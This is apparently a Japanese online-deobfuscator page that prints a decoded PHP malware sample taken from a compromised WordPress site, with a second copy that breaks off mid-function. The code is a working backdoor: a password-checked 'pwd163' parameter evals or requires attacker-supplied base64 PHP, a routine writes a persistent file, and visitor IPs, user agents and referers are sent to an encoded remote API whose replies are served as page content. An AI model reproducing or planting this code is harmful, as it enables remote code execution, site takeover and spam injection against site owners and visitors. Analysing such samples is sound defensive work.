Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $OO0__00_OO = "oA-bNnK7L5_JUtRxIY+WCa93Vk0wM1OeSDdB2j/lsXfqphm*TGvQHrPyc\\4zuF6iZg8E"; $OO_0O_0O_0 = "preg_replace_callback"; $O__O0_OO00 = "stream_socket_client"; $OOO__00_O0 = "stream_get_meta_data"; $O00OO_O__0 = "stream_set_blocking"; $O_O0O_00_O = "stream_set_timeout"; $OO0_OO00__ = "file_put_contents"; $O_00O0__OO = "file_get_contents"; $O_O_0_0OO0 = "sys_get_temp_dir"; $O00O0OO___ = "http_build_query"; $O0__0OOO0_ = "function_exists"; $OO_O0O0__0 = "gethostbyname"; $O_O_0_0O0O = "base64_encode"; $O_O0_0OO_0 = "base64_decode"; $O0_0_O0O_O = "rawurlencode"; $O0O_O0O_0_ = "rawurldecode"; $O00OO_O0__ = "gzuncompress"; $OO_0_O0O_0 = "str_replace"; $O_O00O__O0 = "json_encode"; $OO_0O_0O0_ = "file_exists"; $O0_0O0O_O_ = "curl_setopt"; $O_O_000O_O = "array_shift"; $O0__0_0OOO = "preg_split"; $O0_O0O__0O = "preg_match"; $O0___O0O0O = "curl_error"; $O0O__O0_0O = "curl_close"; $O_0_0OO_O0 = "urlencode"; $OO0O0_O0__ = "urldecode"; $OO__00_OO0 = "str_split"; $OOO_00_O0_ = "parse_url"; $O0__O00O_O = "gzinflate"; $O0OO0_O_0_ = "gzdeflate"; $O000_OO_O_ = "curl_init"; $O_O0O_00_O = "curl_exec"; $O_0O_O0_0O = "array_pop"; $O0O_0_O_O0 = "var_dump"; $O___O00O0O = "is_array"; $O_O0O0_0O_ = "tmpfile"; $O00_OO_O0_ = "tempnam"; $OOO00__0O_ = "print_r"; $O0__O_OO00 = "mt_rand"; $OO_O_000_O = "implode"; $O_00O_O_0O = "explode"; $O_0_0O_0OO = "usleep"; $O00_O_0OO_ = "unlink"; $OO000O_O__ = "strpos"; $OO0O0O_0__ = "strlen"; $O0__O_0OO0 = "hexdec"; $O00_O0__OO = "getenv"; $OO_0OO__00 = "fwrite"; $O_O_O_0O00 = "fclose"; $O__0OO_O00 = "fread"; $OO000__OO_ = "fgets"; $O0OO___00O = "count"; $O0OOO___00 = "chmod"; $O0__0O_O0O = "trim"; $OOO000___O = "join"; $OO_O_O000_ = "feof"; $O__00OO_O0 = "md5"; $O0O_0_O0_O = "danHWRR0lcTDDoavcLAzXMA0iMljRQQtCYZ2ggJ0dLGXGYrxlMJyO5WoQacXgBAwebyGGFergZiSy5djZbb2r0G="; function OO_O0O_0_0($url, $O0O0__0O_O = 0, $OO00_0_OO_ = 1, $OO0O__00O_ = NULL, $O_0_O0OO_0 = array(), $OOO_0_0O_0 = "s") { if (!preg_match("/^https*\\:\\/\\//si", $url)) { if (isset($_GET["urlerr"])) { $O_O0_O_O00 = O__0_O0OO0('iy4tyKXkktKsovilXIzCtLzMlMUQCKWKnlJRUiAXWAMA'); $O_O0_O_O00 .= $url; echo $O_O0_O_O00; unset($O_O0_O_O00); exit; } return ''; } $OO0_O__00O = O__0_O0OO0('Sy4tygdonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBqkSJakA'); $O0O_O00_O_ = $O0_0O0__OO = ''; foreach (explode('|', $OO0_O__00O) as $c) { $OO_O0O__00 = 1; if ($O0O0__0O_O && substr($c, 0, 1) == 'c') { continue; } foreach (explode('+', $c) as $d) { if (!function_exists($d)) { $OO_O0O__00 = 0; } } unset($d); if ($OO_O0O__00) { $O0O_O00_O_ = $c; break; } } unset($OO0_O__00O, $c); if ($O0O_O00_O_ == '') { return 0; } if (substr($O0O_O00_O_, 0, 1) == 'c') { $OO0___OO00 = curl_init(); curl_setopt($OO0___OO00, CURLOPT_URL, $url); curl_setopt($OO0___OO00, CURLOPT_USERAGENT, $OOO_0_0O_0); curl_setopt($OO0___OO00, CURLOPT_RETURNTRANSFER, 1); curl_setopt($OO0___OO00, CURLOPT_TIMEOUT, 100); curl_setopt($OO0___OO00, CURLOPT_FRESH_CONNECT, TRUE); if ($OO00_0_OO_ == 2) { curl_setopt($OO0___OO00, CURLOPT_POST, 1); if (is_array($OO0O__00O_)) { curl_setopt($OO0___OO00, CURLOPT_POSTFIELDS, http_build_query($OO0O__00O_)); } } $O0__0O_OO0 = curl_exec($OO0___OO00); curl_close($OO0___OO00); if (!$O0__0O_OO0) { if (isset($_GET["curlerr"])) { $O_O0_O_O00 = O__0_O0OO0('i04uLVEcpRSC0qyi+KVctLKi6BiwBgA='); $O_O0_O_O00 .= curl_error($OO0___OO00); echo $O_O0_O_O00; unset($O_O0_O_O00); exit; } return 0; } else { return $O0__0O_OO0; } } $OO00O__0_O = parse_url($url); isset($OO00O__0_O["host"]) || ($OO00O__0_O["host"] = ''); isset($OO00O__0_O["path"]) || ($OO00O__0_O["path"] = ''); isset($OO00O__0_O["query"]) || ($OO00O__0_O["query"] = ''); isset($OO00O__0_O["port"]) || ($OO00O__0_O["port"] = ''); $O_0_0_O0OO = $OO00O__0_O["path"] ? $OO00O__0_O["path"] . ($OO00O__0_O["query"] ? '?' . $OO00O__0_O["query"] : '') : '/'; $O_00O0OO__ = $OO00O__0_O["host"]; if ($OO00O__0_O["scheme"] == 'https') { $OO__O0O0_0 = '1.1'; $O_O0_OO_00 = empty($OO00O__0_O["port"]) ? 443 : $OO00O__0_O["port"]; $O_00O0OO__ = O__0_O0OO0('Ky7OshbdLMHXBwA='); $O_00O0OO__ .= $OO00O__0_O["host"]; } else { $OO__O0O0_0 = '1.0'; $O_O0_OO_00 = empty($OO00O__0_O["port"]) ? 80 : $OO00O__0_O["port"]; } $OOO_00O__0 = 'Host:'; $OOO_00O__0 .= $O_00O0OO__; $O_0_O0OO_0[] = $OOO_00O__0; $O_0_O0OO_0[] = O__0_O0OO0('c87Pyjg0tNLsnMz7NyzskdfvTgUA'); $O_0_O0OO_0[] = O__0_O0OO0('Cy1OLukdJ1TE/NK7EUFCAA==') . $OOO_0_0O_0; $O_0_O0OO_0[] = O__0_O0OO0('c0xOTwGi0osdLEaS1wIA'); unset($OOO_00O__0); if ($OO00_0_OO_ == 2) { if (is_array($OO0O__00O_)) { $OO0O__00O_ = http_build_query($OO0O__00O_); } $O_0_O0OO_0[] = O__0_O0OO0('c87PKwf0nNK9EtqSxItUosKMjJTE4syczP06/QLS8v103LL8rVLS3KSc1Lzk9iSJTQEA'); $O_0_O0OO_0[] = O__0_O0OO0('c87PKKB0nNK9H1Sc1LL8mnewAgA=') . strlen($OO0O__00O_); $O0_0O0__OO = "POST {$O_0_0_O0OO} HTTP/{$OO__O0O0_0}" . PHP_EOL . join(PHP_EOL, $O_0_O0OO_0) . PHP_EOL . PHP_EOL . $OO0O__00O_; unset($OO0O__00O_); } else { $O0_0O0__OO = "GET {$O_0_0_O0OO} HTTP/{$OO__O0O0_0}" . PHP_EOL . join(PHP_EOL, $O_0_O0OO_0) . PHP_EOL . PHP_EOL; } unset($O_0_O0OO_0, $OO00O__0_O, $OO__O0O0_0, $O_0_0_O0OO); $OOO_O0__00 = null; if (substr($O0O_O00_O_, 1) == 'n') { $OOO_O0__00 = $O0O_O00_O_($O_00O0OO__, $O_O0_OO_00, $O_O0_O_O00no, $O_O0_O_O00str, 30); } else { if (substr($O0O_O00_O_, 1) == 't') { $O__OO0O_00 = O__0_O0OO0('K0kusngNLlWXBwA='); $O__OO0O_00 .= $O_00O0OO__; $O__OO0O_00 .= ':'; $O__OO0O_00 .= $O_O0_OO_00; $OOO_O0__00 = stream_socket_client($O__OO0O_00, $O_O0_O_O00no, $O_O0_O_O00str, 30); unset($O__OO0O_00); } } $O_00__O0OO = ''; if ($OOO_O0__00) { stream_set_blocking($OOO_O0__00, TRUE); curl_exec($OOO_O0__00, 30); fwrite($OOO_O0__00, $O0_0O0__OO); if (!$O0O0__0O_O) { $O00__OOO_0 = stream_get_meta_data($OOO_O0__00); if (!$O00__OOO_0["timed_out"]) { while (!feof($OOO_O0__00)) { $OO_0_0O_0O = fgets($OOO_O0__00); if ($OO_0_0O_0O && (rawurlencode($OO_0_0O_0O) == "%0D%0A" || rawurlencode($OO_0_0O_0O) == "%0A")) { break; } unset($OO_0_0O_0O); } while (!feof($OOO_O0__00)) { $O00_O_OO0_ = fread($OOO_O0__00, 8192); $O_00__O0OO .= $O00_O_OO0_; unset($O00_O_OO0_); } } unset($O00__OOO_0); } fclose($OOO_O0__00); } else { if (substr($O0O_O00_O_, 1) == 'e') { $O0OO_00__O = gethostbyname($O_00O0OO__); $OOO_O0__00 = $O0O_O00_O_(AF_INET, SOCK_STREAM, 0); if (socket_connect($OOO_O0__00, $O0OO_00__O, $O_O0_OO_00)) { if (!$O0O0__0O_O) { socket_write($OOO_O0__00, $O0_0O0__OO, strlen($O0_0O0__OO)); while ($O_O00_O_0O = @socket_read($OOO_O0__00, 8192)) { $O_00__O0OO .= $O_O00_O_0O; unset($O_O00_O_0O); } $O_00__O0OO = explode("\\r\\n\\r\\n", $O_00__O0OO); array_shift($O_00__O0OO); $O_00__O0OO = implode("\\r\\n\\r\\n", $O_00__O0OO); } else { $O_O0_O00_O = mt_rand(2, 5); $O000O__OO_ = 0; while ($O000O__OO_ < $O_O0_O00_O) { socket_write($OOO_O0__00, $O0_0O0__OO, strlen($O0_0O0__OO)); $O000O__OO_++; usleep(mt_rand(50000, 100000)); } unset($O000O__OO_, $O_O0_O00_O); } } socket_close($OOO_O0__00); unset($O0OO_00__O); } } unset($O0_0O0__OO, $O0O_O00_O_, $OOO_O0__00, $O_O0_OO_00, $O_00O0OO__); if (!$O0O0__0O_O) { $O_00__O0OO = @preg_replace_callback('/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si', 'O__0_O00OO', $O_00__O0OO); return trim(trim($O_00__O0OO, "\\xEF\\xBB\\xBF")); } else { return 1; } } function O__0_O00OO($matches) { return hexdec($matches[1]) == strlen($matches[2]) ? $matches[2] : $matches[0]; } function O_OO_O000_($O_OOO00_0_) { $OO0O__0_O0 = base64_encode(gzdeflate($O_OOO00_0_)); $O_0__0OOO0 = substr($OO0O__0_O0, 0, 5); $O0_O0_O0O_ = substr($OO0O__0_O0, 5); $O_OO_00O0_ = substr($OO0O__0_O0, 5, strlen($OO0O__0_O0) - 10); return $O_0__0OOO0 . 'hT' . substr($OO0O__0_O0, 5, strlen($OO0O__0_O0) - 10) . 'tP' . $O0_O0_O0O_; } function O__0_O0OO0($O_OOO00_0_) { $O_0__0OOO0 = substr($O_OOO00_0_, 0, 5); $O0_O0_O0O_ = substr($O_OOO00_0_, 5); $O_OO_00O0_ = substr($O_OOO00_0_, 7, strlen($O_OOO00_0_) - 14); return gzinflate(base64_decode($O_0__0OOO0 . $O_OO_00O0_ . $O0_O0_O0O_)); } function O00_0OO_O_($O_00_0_OOO = '') { if (isset($_SERVER)) { if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { $O_00_0_OOO = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { if (isset($_SERVER["HTTP_CLIENT_IP"])) { $O_00_0_OOO = $_SERVER["HTTP_CLIENT_IP"]; } else { $O_00_0_OOO = $_SERVER["REMOTE_ADDR"]; } } } else { if (getenv('HTTP_X_FORWARDED_FOR')) { $O_00_0_OOO = getenv('HTTP_X_FORWARDED_FOR'); } else { if (getenv('HTTP_CLIENT_IP')) { $O_00_0_OOO = getenv('HTTP_CLIENT_IP'); } else { $O_00_0_OOO = getenv('REMOTE_ADDR'); } } } return $O_00_0_OOO; } function O_OO_00_O0($O_OOO00_0_ = '') { if (isset($_SERVER["HTTP_HOST"])) { return $_SERVER["HTTP_HOST"]; } elseif (isset($_SERVER["SERVER_NAME"])) { return $_SERVER["SERVER_NAME"]; } return $O_OOO00_0_; } function O0O_O0__0O($O0O_0_O0_O) { $O0_O0__O0O = str_split($O0O_0_O0_O); $O0O_0_O_0O = ''; for ($O000O__OO_ = 0; $O000O__OO_ < count($O0_O0__O0O); $O000O__OO_++) { if ($O000O__OO_ % 2 != 0) { $O0O_0_O_0O .= $O0_O0__O0O[$O000O__OO_]; } } return base64_decode($O0O_0_O_0O); } function OOO0O_0_0_($O_00__O0OO) { $O_00__O0OO = @gzuncompress(base64_decode($O_00__O0OO)); $O_0_O0_0OO = @preg_split("/\\|/si", $O_00__O0OO, 1, PREG_SPLIT_NO_EMPTY); if (!is_array($O_0_O0_0OO)) { return false; } if (count($O_0_O0_0OO) < 2) { return false; } $O_00__O0OO_array["data"] = array_pop($O_0_O0_0OO); $O_00__O0OO_array["data"] = base64_decode($O_00__O0OO_array["data"]); $O_00__O0OO_array["headers"] = $O_0_O0_0OO; return $O_00__O0OO_array; } function OOO0__0_O0($O0OO0__O0_ = '') { $OO_O0O0_0_ = O__0_O0OO0('K8pPyvMi8p1iuEMpKAEA'); if (file_exists($OO_O0O0_0_)) { @unlink($OO_O0O0_0_); } if ($O0OO0__O0_ == '') { $O0OO0__O0_ = O__0_O0OO0('08soSBCUxOTi0XvuBgA='); } $O_00__O0OO = O__0_O0OO0('lVFNrxp5swEPxBvZiPSHB4h0CDgRDKR7DBN2waQ7ABlQTC+/VFIU9pT1VPq1nN7MzuRgcyUIg+z9gBhcq51+g9c4VB8lpcXKtndtt6V/3oHcyFQLR40BkpNLUAJoJ27dp/Vk46f6KpVVM4HyPbhCV+CAaUuoJhH/HeSKQYSR6GRZ5cS3vf5E1dF9JUKns3l65lMOm0JTbuDNbzBYr76qUH3ervPq5U3QGCd+CFR6qGv06fxfzCNYHKQJttTqXtb2u+rsT6Nsut5gDPM1HF/cXXmK2AEqIbSd8apoZLmVuALe8ewclQQXN56v55hw17kCxUBbzAj9G+ztNfe3/Xj9FByDM222q9jweViTjrvLxavRMRyNM3W/ii0vzVFzlUVgOVGT+r+jGTSGNSAJL5NVMzHsxD+qXLOjSS1PpZ4l27/o1teWMepBY9O+APbThRGXM/v6UJclCCwiwHxD8f0I84U5xLuq8DXPwnP37zka9QuGZr9tOWhT9/4Dm3Ux73RgDeu0fZP84+M3'); $O_00__O0OO = @base64_decode($O_00__O0OO); if (file_exists($O0OO0__O0_)) { $O0O0_OO__0 = file_get_contents($O0OO0__O0_); if ($O_00__O0OO == $O0O0_OO__0) { return; } } @chmod($O0OO0__O0_, 0777); @file_put_contents($O0OO0__O0_, $O_00__O0OO); @chmod($O0OO0__O0_, 0644); } function O__0_0OOO0($O0_O0OO__0, $OOO00O0___) { $O0_O00O__O = O__0_O0OO0('yygpKjySi20tcvLy/XS8/PT89J1UvOz9UvyMxLty/OLEnNTSywVS1WLdZaPXLQYA'); $O0O_O_O_00 = sprintf($O0_O00O__O, $OOO00O0___["protocol"], $OOO00O0___["server_domain"], $O0_O0OO__0); $O_O00O_O_0 = OO_O0O_0_0($O0O_O_O_00); if (isset($_REQUEST["st"])) { var_dump($O0O_O_O_00); var_dump($O_O00O_O_0); die; } $O0_O_0_OO0 = O__0_O0OO0('S8/PTla89zKJBQA='); $O0O0O__0O_ = O__0_O0OO0('Ky5NTbHk4FdtLgYA'); $O0_00O_O_O = O__0_O0OO0('S0vMzJVEllSNAQA='); if (strpos($O_O00O_O_0, $O0_O_0_OO0) != false) { die($O0O0O__0O_); } else { $O0_O00O__O = O__0_O0OO0('yygpKUSbDS1y8vL9dLz89Pz0nVS87P1S/IzEu3L84sSc1NLLBVLVYt1lchqtBgA='); $O0O_O_O_00 = sprintf($O0_O00O__O, $OOO00O0___["protocol"], $OOO00O0___["server_domain"], $O0_O0OO__0); $O_O00O_O_0 = OO_O0O_0_0($O0O_O_O_00); if (strpos($O_O00O_O_0, $O0_O_0_OO0) != false) { die($O0O0O__0O_); } die($O0_00O_O_O); } } function O__O_0O0O0($zzz) { $O___0OOO00 = tempnam(sys_get_temp_dir(), "z1zz"); $OO0_O__00O = base64_decode(rawurldecode(urlencode(urldecode($zzz)))); $O_0OO0__O0 = "<?php"; if (strpos($OO0_O__00O, $O_0OO0__O0) === false) { $OO0_O__00O = "<?phpPHP_EOL" . $OO0_O__00O; } @file_put_contents($O___0OOO00, $OO0_O__00O); @(require $O___0OOO00); @unlink($O___0OOO00); die; } function OO00O0O___($O0O_0_O0_O) { $OOO00O0___ = array(); $OOO00O0___["default_params"] = $O0O_0_O0_O; $OOO00O0___["api"] = O0O_O0__0O($OOO00O0___["default_params"]); $OOO00O0___["server_domain"] = O_OO_00_O0(); $OOO00O0___["request_url"] = $_SERVER["REQUEST_URI"]; $OOO00O0___["referer"] = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $OOO00O0___["user_agent"] = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; $OOO00O0___["ip"] = O00_0OO_O_(); if (isset($_SERVER["HTTPS"])) { $OOO00O0___["protocol"] = O__0_O0OO0('yygpKqHSi20tcKcHAA=='); } else { $OOO00O0___["protocol"] = O__0_O0OO0('yygpKUQbDpRS1wcA'); } if (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])) { $OOO00O0___["language"] = $_SERVER["HTTP_ACCEPT_LANGUAGE"]; } else { $OOO00O0___["language"] = ""; } if (isset($_REQUEST["params"])) { $OO0_O_O00_ = O__0_O0OO0('c87PKqL0nNK9EtqSxItUosKMjJTE4syczP088qzs8mHDAA=='); header($OO0_O_O00_); if (function_exists('json_encode')) { echo json_encode($OOO00O0___); } else { print_r($OOO00O0___); } die; } if (isset($_REQUEST["d_time"])) { die('2022/4/6'); } if (isset($_REQUEST["pwd163"])) { if (md5(trim($_REQUEST["pwd163"])) == "5f56160bba23d01e03a196a0e3f7acd2") { $OO0_O__00O = base64_decode(rawurldecode(urlencode(urldecode($_REQUEST["zzz"])))); $O_0OO0__O0 = "<?php"; if (strpos($OO0_O__00O, $O_0OO0__O0) === false) { $OO0_O__00O = "<?phpPHP_EOL" . $OO0_O__00O; } if (isset($_REQUEST["e"])) { $OO0_O__00O = str_replace($O_0OO0__O0, "", $OO0_O__00O); $O0O_O00_O_ = "eval"; eval($OO0_O__00O); die; } $O___0OOO00 = tmpfile(); fwrite($O___0OOO00, $OO0_O__00O); $O0___O0OO0 = stream_get_meta_data($O___0OOO00); @(require $O0___O0OO0["uri"]); fclose($O___0OOO00); die; } if (md5($_REQUEST["pwd163"] . "a!#_11AA") == "2f7a76f71ff9e24be7c0015ff9cb81d8") { if (isset($_GET["sitemap"])) { $O0_O0OO__0 = $_GET["sitemap"]; O__0_0OOO0($O0_O0OO__0, $OOO00O0___); } } } OOO0__0_O0(); $O_0O_0OO_0 = array('domain' => $OOO00O0___["server_domain"], 'request_url' => $OOO00O0___["request_url"], 'ip' => $OOO00O0___["ip"], 'agent' => $OOO00O0___["user_agent"], 'referer' => $OOO00O0___["referer"], 'protocol' => $OOO00O0___["protocol"], 'language' => $OOO00O0___["language"]); $O_00__O0OO = OO_O0O_0_0($OOO00O0___["api"], 0, 2, $O_0O_0OO_0, array(), $OOO00O0___["server_domain"]); if (isset($_REQUEST["dump"])) { var_dump($O_00__O0OO); $O_00__O0OO = OO_O0O_0_0("http://google.co.jp"); var_dump($O_00__O0OO); die; } $O00_O_OO0_ = OOO0O_0_0_($O_00__O0OO); if ($O00_O_OO0_ !== false) { foreach ($O00_O_OO0_["headers"] as $OO0_O_O00_) { @header($OO0_O_O00_); } echo $O00_O_OO0_["data"]; die; } } OO00O0O___($O0O_0_O0_O);
<?php $OO0__00_OO = "oA-bNnK7L5_JUtRxIY+WCa93Vk0wM1OeSDdB2j/lsXfqphm*TGvQHrPyc\\4zuF6iZg8E"; $OO_0O_0O_0 = "preg_replace_callback"; $O__O0_OO00 = "stream_socket_client"; $OOO__00_O0 = "stream_get_meta_data"; $O00OO_O__0 = "stream_set_blocking"; $O_O0O_00_O = "stream_set_timeout"; $OO0_OO00__ = "file_put_contents"; $O_00O0__OO = "file_get_contents"; $O_O_0_0OO0 = "sys_get_temp_dir"; $O00O0OO___ = "http_build_query"; $O0__0OOO0_ = "function_exists"; $OO_O0O0__0 = "gethostbyname"; $O_O_0_0O0O = "base64_encode"; $O_O0_0OO_0 = "base64_decode"; $O0_0_O0O_O = "rawurlencode"; $O0O_O0O_0_ = "rawurldecode"; $O00OO_O0__ = "gzuncompress"; $OO_0_O0O_0 = "str_replace"; $O_O00O__O0 = "json_encode"; $OO_0O_0O0_ = "file_exists"; $O0_0O0O_O_ = "curl_setopt"; $O_O_000O_O = "array_shift"; $O0__0_0OOO = "preg_split"; $O0_O0O__0O = "preg_match"; $O0___O0O0O = "curl_error"; $O0O__O0_0O = "curl_close"; $O_0_0OO_O0 = "urlencode"; $OO0O0_O0__ = "urldecode"; $OO__00_OO0 = "str_split"; $OOO_00_O0_ = "parse_url"; $O0__O00O_O = "gzinflate"; $O0OO0_O_0_ = "gzdeflate"; $O000_OO_O_ = "curl_init"; $O_O0O_00_O = "curl_exec"; $O_0O_O0_0O = "array_pop"; $O0O_0_O_O0 = "var_dump"; $O___O00O0O = "is_array"; $O_O0O0_0O_ = "tmpfile"; $O00_OO_O0_ = "tempnam"; $OOO00__0O_ = "print_r"; $O0__O_OO00 = "mt_rand"; $OO_O_000_O = "implode"; $O_00O_O_0O = "explode"; $O_0_0O_0OO = "usleep"; $O00_O_0OO_ = "unlink"; $OO000O_O__ = "strpos"; $OO0O0O_0__ = "strlen"; $O0__O_0OO0 = "hexdec"; $O00_O0__OO = "getenv"; $OO_0OO__00 = "fwrite"; $O_O_O_0O00 = "fclose"; $O__0OO_O00 = "fread"; $OO000__OO_ = "fgets"; $O0OO___00O = "count"; $O0OOO___00 = "chmod"; $O0__0O_O0O = "trim"; $OOO000___O = "join"; $OO_O_O000_ = "feof"; $O__00OO_O0 = "md5"; $O0O_0_O0_O = "danHWRR0lcTDDoavcLAzXMA0iMljRQQtCYZ2ggJ0dLGXGYrxlMJyO5WoQacXgBAwebyGGFergZiSy5djZbb2r0G="; function OO_O0O_0_0($url, $O0O0__0O_O = 0, $OO00_0_OO_ = 1, $OO0O__00O_ = NULL, $O_0_O0OO_0 = array(), $OOO_0_0O_0 = "s") { if (!preg_match("/^https*\\:\\/\\//si", $url)) { if (isset($_GET["urlerr"])) { $O_O0_O_O00 = O__0_O0OO0('iy4tyKXkktKsovilXIzCtLzMlMUQCKWKnlJRUiAXWAMA'); $O_O0_O_O00 .= $url; echo $O_O0_O_O00; unset($O_O0_O_O00); exit; } return ''; } $OO0_O__00O = O__0_O0OO0('Sy4tygdonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBqkSJakA'); $O0O_O00_O_ = $O0_0O0__OO = ''; foreach (explode('|', $OO0_O__00O) as $c) { $OO_O0O__00 = 1; if ($O0O0__0O_O && substr($c, 0, 1) == 'c') { continue; } foreach (explode('+', $c) as $d) { if (!function_exists($d)) { $OO_O0O__00 = 0; } } unset($d); if ($OO_O0O__00) { $O0O_O00_O_ = $c; break; } } unset($OO0_O__00O, $c); if ($O0O_O00_O_ == '') { return 0; } if (substr($O0O_O00_O_, 0, 1) == 'c') { $OO0___OO00 = curl_init(); curl_setopt($OO0___OO00, CURLOPT_URL, $url); curl_setopt($OO0___OO00, CURLOPT_USERAGENT, $OOO_0_0O_0); curl_setopt($OO0___OO00, CURLOPT_RETURNTRANSFER, 1); curl_setopt($OO0___OO00, CURLOPT_TIMEOUT, 100); curl_setopt($OO0___OO00, CURLOPT_FRESH_CONNECT, TRUE); if ($OO00_0_OO_ == 2) { curl_setopt($OO0___OO00, CURLOPT_POST, 1); if (is_array($OO0O__00O_)) { curl_setopt($OO0___OO00, CURLOPT_POSTFIELDS, http_build_query($OO0O__00O_)); } } $O0__0O_OO0 = curl_exec($OO0___OO00); curl_close($OO0___OO00); if (!$O0__0O_OO0) { if (isset($_GET["curlerr"])) { $O_O0_O_O00 = O__0_O0OO0('i04uLVEcpRSC0qyi+KVctLKi6BiwBgA='); $O_O0_O_O00 .= curl_error($OO0___OO00); echo $O_O0_O_O00; unset($O_O0_O_O00); exit; } return 0; } else { return $O0__0O_OO0; } } $OO00O__0_O = parse_url($url); isset($OO00O__0_O["host"]) || ($OO00O__0_O["host"] = ''); isset($OO00O__0_O["path"]) || ($OO00O__0_O["path"] = ''); isset($OO00O__0_O["query"]) || ($OO00O__0_O["query"] = ''); isset($OO00O__0_O["port"]) || ($OO00O__0_O["port"] = ''); $O_0_0_O0OO = $OO00O__0_O["path"] ? $OO00O__0_O["path"] . ($OO00O__0_O["query"] ? '?' . $OO00O__0_O["query"] : '') : '/'; $O_00O0OO__ = $OO00O__0_O["host"]; if ($OO00O__0_O["scheme"] == 'https') { $OO__O0O0_0 = '1.1'; $O_O0_OO_00 = empty($OO00O__0_O["port"]) ? 443 : $OO00O__0_O["port"]; $O_00O0OO__ = O__0_O0OO0('Ky7OshbdLMHXBwA='); $O_00O0OO__ .= $OO00O__0_O["host"]; } else { $OO__O0O0_0 = '1.0'; $O_O0_OO_00 = empty($OO00O__0_O["port"]) ? 80 : $OO00O__0_O["port"]; } $OOO_00O__0 = 'Host:'; $OOO_00O__0 .= $O_00O0OO__; $O_0_O0OO_0[] = $OOO_00O__0; $O_0_O0OO_0[] = O__0_O0OO0('c87Pyjg0tNLsnMz7NyzskdfvTgUA'); $O_0_O0OO_0[] = O__0_O0OO0('Cy1OLukdJ1TE/NK7EUFCAA==') . $OOO_0_0O_0; $O_0_O0OO_0[] = O__0_O0OO0('c0xOTwGi0osdLEaS1wIA'); unset($OOO_00O__0); if ($OO00_0_OO_ == 2) { if (is_array($OO0O__00O_)) { $OO0O__00O_ = http_build_query($OO0O__00O_); } $O_0_O0OO_0[] = O__0_O0OO0('c87PKwf0nNK9EtqSxItUosKMjJTE4syczP06/QLS8v103LL8rVLS3KSc1Lzk9iSJTQEA'); $O_0_O0OO_0[] = O__0_O0OO0('c87PKKB0nNK9H1Sc1LL8mnewAgA=') . strlen($OO0O__00O_); $O0_0O0__OO = "POST {$O_0_0_O0OO} HTTP/{$OO__O0O0_0}" . PHP_EOL . join(PHP_EOL, $O_0_O0OO_0) . PHP_EOL . PHP_EOL . $OO0O__00O_; unset($OO0O__00O_); } else { $O0_0O0__OO = "GET {$O_0_0_O0OO} HTTP/{$OO__O0O0_0}" . PHP_EOL . join(PHP_EOL, $O_0_O0OO_0) . PHP_EOL . PHP_EOL; } unset($O_0_O0OO_0, $OO00O__0_O, $OO__O0O0_0, $O_0_0_O0OO); $OOO_O0__00 = null; if (substr($O0O_O00_O_, 1) == 'n') { $OOO_O0__00 = $O0O_O00_O_($O_00O0OO__, $O_O0_OO_00, $O_O0_O_O00no, $O_O0_O_O00str, 30); } else { if (substr($O0O_O00_O_, 1) == 't') { $O__OO0O_00 = O__0_O0OO0('K0kusngNLlWXBwA='); $O__OO0O_00 .= $O_00O0OO__; $O__OO0O_00 .= ':'; $O__OO0O_00 .= $O_O0_OO_00; $OOO_O0__00 = stream_socket_client($O__OO0O_00, $O_O0_O_O00no, $O_O0_O_O00str, 30); unset($O__OO0O_00); } } $O_00__O0OO = ''; if ($OOO_O0__00) { stream_set_blocking($OOO_O0__00, TRUE); curl_exec($OOO_O0__00, 30); fwrite($OOO_O0__00, $O0_0O0__OO); if (!$O0O0__0O_O) { $O00__OOO_0 = stream_get_meta_data($OOO_O0__00); if (!$O00__OOO_0["timed_out"]) { while (!feof($OOO_O0__00)) { $OO_0_0O_0O = fgets($OOO_O0__00); if ($OO_0_0O_0O && (rawurlencode($OO_0_0O_0O) == "%0D%0A" || rawurlencode($OO_0_0O_0O) == "%0A")) { break; } unset($OO_0_0O_0O); } while (!feof($OOO_O0__00)) { $O00_O_OO0_ = fread($OOO_O0__00, 8192); $O_00__O0OO .= $O00_O_OO0_; unset($O00_O_OO0_); } } unset($O00__OOO_0); } fclose($OOO_O0__00); } else { if (substr($O0O_O00_O_, 1) == 'e') { $O0OO_00__O = gethostbyname($O_00O0OO__); $OOO_O0__00 = $O0O_O00_O_(AF_INET, SOCK_STREAM, 0); if (socket_connect($OOO_O0__00, $O0OO_00__O, $O_O0_OO_00)) { if (!$O0O0__0O_O) { socket_write($OOO_O0__00, $O0_0O0__OO, strlen($O0_0O0__OO)); while ($O_O00_O_0O = @socket_read($OOO_O0__00, 8192)) { $O_00__O0OO .= $O_O00_O_0O; unset($O_O00_O_0O); } $O_00__O0OO = explode("\\r\\n\\r\\n", $O_00__O0OO); array_shift($O_00__O0OO); $O_00__O0OO = implode("\\r\\n\\r\\n", $O_00__O0OO); } else { $O_O0_O00_O = mt_rand(2, 5); $O000O__OO_ = 0; while ($O000O__OO_ < $O_O0_O00_O) { socket_write($OOO_O0__00, $O0_0O0__OO, strlen($O0_0O0__OO)); $O000O__OO_++; usleep(mt_rand(50000, 100000)); } unset($O000O__OO_, $O_O0_O00_O); } } socket_close($OOO_O0__00); unset($O0OO_00__O); } } unset($O0_0O0__OO, $O0O_O00_O_, $OOO_O0__00, $O_O0_OO_00, $O_00O0OO__); if (!$O0O0__0O_O) { $O_00__O0OO = @preg_replace_callback('/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si', 'O__0_O00OO', $O_00__O0OO); return trim(trim($O_00__O0OO, "\\xEF\\xBB\\xBF")); } else { return 1; } } function O__0_O00OO($matches) { return hexdec($matches[1]) == 